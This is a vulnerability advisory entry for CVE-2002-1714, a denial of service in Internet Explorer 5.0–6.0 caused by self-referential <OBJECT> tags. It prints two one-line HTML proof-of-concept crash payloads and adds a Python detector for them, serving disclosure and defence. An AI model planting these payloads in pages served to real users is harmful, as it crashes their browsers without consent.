Microsoft Internet Explorer Self-Referential Object Denial of Service Vulnerability


Vulnerability ID 1106695 Vulnerability type Other
Published 2002-04-20 Updated 2005-10-20
CVE ID CVE-2002-1714
CNNVD-ID CNNVD-200212-582
Platform Windows CVSS score 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/21404
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-582
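|Vulnerability details
Microsoft Internet Explorer versions 5.0 through 6.0 contain a vulnerability. A remote attacker can cause a denial of service (crash) by means of an HTML file that defines an object of type "text/html" whose DATA field identifies the HTML document that contains the object; the flaw results in infinite recursion.
|Exploit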
source: http://www.securityfocus.com/bid/4564/info

Microsoft Internet Explorer is vulnerable to a denial of service due to an error in handling certain self-referential <OBJECT> definitions in HTML documents. This occurs when an object of type "text/html" is specified, with the DATA field referencing the name of the HTML document in which it is defined. Other circumstances may also trigger this condition.

Create a file named "CRASH.HTM" with the following line in it:

<OBJECT DATA="CRASH.HTM" TYPE="text/html"></OBJECT>

The following example was also submitted by Ryan Emerle:

<object id="test"
data="#"
width="100%" height="100%"
type="text/x-scriptlet"
VIEWASTEXT></object>
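
A defender-side check for the pattern described above, as an added example that is not part of the original advisory: it flags <OBJECT> tags of the two types shown whose DATA resolves to the containing document. The function name, the sample URL and the case-insensitive comparison are assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urldefrag, urljoin

# MIME types used by the two proof-of-concept snippets on this page.
RENDERED_TYPES = {"text/html", "text/x-scriptlet"}


class SelfRefObjectFinder(HTMLParser):
    """Collects <object> tags whose DATA URL resolves to the document itself."""

    def __init__(self, doc_url):
        super().__init__()
        # Assumption: compare case-insensitively, as Windows file names are.
        self.doc_url = urldefrag(doc_url).url.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names; bare attributes
        # such as VIEWASTEXT arrive with a value of None.
        attr = {name: (value or "") for name, value in attrs}
        if tag != "object" or "data" not in attr:
            return
        if attr.get("type", "").strip().lower() not in RENDERED_TYPES:
            return
        # Resolve DATA against the document URL and drop any fragment, so
        # "CRASH.HTM", "./CRASH.HTM" and "#" all normalise to the same URL.
        target = urldefrag(urljoin(self.doc_url, attr["data"].strip())).url
        if target.lower() == self.doc_url:
            self.findings.append((self.getpos()[0], attr["data"]))


def find_self_referencing_objects(html, doc_url):
    """Return (line, DATA value) for each self-referential <object> tag."""
    finder = SelfRefObjectFinder(doc_url)
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample: the two patterns from the page plus two benign tags.
SAMPLE_URL = "http://intranet.example/docs/CRASH.HTM"  # hypothetical location
SAMPLE = """<html><body>
<OBJECT DATA="CRASH.HTM" TYPE="text/html"></OBJECT>
<object id="test" data="#" type="text/x-scriptlet" VIEWASTEXT></object>
<object data="other.htm" type="text/html"></object>
<object data="CRASH.HTM" type="image/png"></object>
</body></html>"""

if __name__ == "__main__":
    for line, data in find_self_referencing_objects(SAMPLE, SAMPLE_URL):
        print(f"line {line}: self-referential <object> DATA={data!r}")
```

The check can run in a mail or web gateway filter over inbound HTML; it covers only the two patterns shown on this page, not the "other circumstances" the advisory mentions.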
|References

Source: XF
Name: ie-object-directive-dos(8904)
Link: http://xforce.iss.net/xforce/xfdb/8904
Source: BID
Name: 4564
Link: http://www.securityfocus.com/bid/4564
